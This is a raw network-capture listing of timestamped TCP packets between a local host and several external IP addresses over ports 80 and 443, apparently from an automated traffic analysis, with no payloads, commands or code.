                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.667035103 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.667094946 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.668068886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.668081045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.668135881 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.669576883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.669961929 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670231104 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670245886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670245886 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670259953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670274973 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670277119 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670298100 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.670614958 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.671158075 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.671879053 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.671924114 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.671937943 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.671979904 CET44349780172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672230959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672250986 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672290087 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672291994 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672588110 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.672641993 CET44349781172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.675384045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.675398111 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.675436974 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.678634882 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.678649902 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.678693056 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.681436062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.681442976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.681490898 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.684339046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.684549093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.684590101 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.687370062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.687475920 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.687545061 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.690321922 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.690551043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.690589905 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.694072962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.694084883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.694127083 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.696222067 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.696847916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.696887016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.701219082 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.701231956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.701292038 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.701885939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.702261925 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.702317953 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.704791069 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.705135107 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.705176115 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.707984924 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.707998037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.708050966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.710638046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.711385965 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.711431026 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.713613987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.713759899 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.713804007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.715815067 CET49781443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.716624022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.716636896 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.716677904 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.719692945 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.719705105 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.719753027 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.722928047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.722943068 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.722995043 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.725446939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.725466013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.725519896 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.729965925 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.729981899 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.730030060 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731534958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731548071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731586933 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735456944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735471010 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735528946 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737507105 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737519979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737577915 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740144014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740158081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740219116 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743174076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743185997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743247986 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746860027 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746872902 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746905088 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.749953032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.749967098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.750000954 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.751658916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.753477097 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.753520966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755374908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755388975 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755419016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758049965 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758063078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758099079 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.760711908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.761437893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.761487961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.762610912 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.763714075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.764298916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.764338970 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766488075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766536951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766835928 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.769138098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.770190001 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.770271063 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772687912 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772700071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772762060 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774712086 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774744987 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774789095 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774805069 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774832964 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774846077 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776309967 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776324034 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776395082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.779975891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.779989958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.780050993 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786060095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786073923 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786123991 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788088083 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788115978 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788149118 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788163900 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788199902 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788243055 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789105892 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789125919 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789221048 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789228916 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789318085 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790771008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790785074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790844917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.795452118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.796677113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.796737909 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802058935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802072048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802153111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804033995 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804039001 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804059029 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804059982 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804137945 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804141998 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804152012 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804164886 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804166079 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804172039 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804198027 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804225922 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807054043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807065964 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807125092 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.812397957 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.812410116 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.812463999 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.816977978 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.816994905 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817042112 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817116976 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817152023 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817157030 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817183018 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817192078 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817214966 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817229986 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817231894 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817240953 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817260981 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817264080 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.817292929 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.819627047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.820453882 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.820498943 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.824150085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.824184895 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.824254990 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825109959 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825148106 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825174093 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825181961 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825202942 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825213909 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825227976 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825228930 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825246096 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825278997 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825279951 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.825323105 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.826745033 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.826797009 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.826857090 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.830399036 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833220959 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833249092 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833287001 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833300114 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833328009 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.833355904 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834073067 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834120989 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834144115 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834151983 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834178925 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.834203005 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.840235949 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.840270042 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.840308905 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841219902 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841228008 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841252089 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841263056 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841373920 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841377020 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841381073 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841402054 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841422081 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.841449976 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.842065096 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.842078924 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.842118979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.844685078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.844736099 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.845581055 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849164009 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849190950 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849231005 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849237919 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849268913 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849278927 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849292994 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849328041 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849344969 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849351883 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849383116 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.849390984 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.856416941 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.856456995 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.856473923 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.856481075 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.856520891 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.870079041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.870126009 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.870204926 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.870978117 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.871015072 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.871067047 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.872339010 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.872481108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.872540951 CET4977680192.168.2.6139.99.188.124
